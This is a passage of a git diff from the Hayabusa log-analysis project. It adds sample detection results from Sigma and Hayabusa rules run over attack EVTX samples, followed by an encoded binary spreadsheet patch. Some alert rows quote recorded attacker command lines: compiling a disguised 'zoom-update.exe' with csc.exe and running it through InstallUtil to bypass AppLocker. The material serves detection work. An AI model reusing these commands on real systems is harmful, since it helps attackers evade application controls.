+2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
+2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
+2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
+2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx
+2021-11-18 16:40:29.566 +09:00,PC-01.cybercat.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface  :  Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  /unsafe /nologo /target:exe /out:zoom-update.exe C:\Users\pc1-user\Desktop\zoom-update.cs  :  Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  :  User: CYBERCAT\pc1-user  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx
+2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1218.004,technique_name=InstallUtil  :  Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  /logfile= /LogToConsole=false /U C:\Users\pc1-user\Desktop\zoom-update.exe  :  Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe  :  User: CYBERCAT\pc1-user  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
+2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx
\ No newline at end of file
diff --git a/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.xlsx b/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.xlsx
new file mode 100644
index 0000000000000000000000000000000000000000..96bbd972840907d397dfac880573fc8375556723
GIT binary patch
literal 711827
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
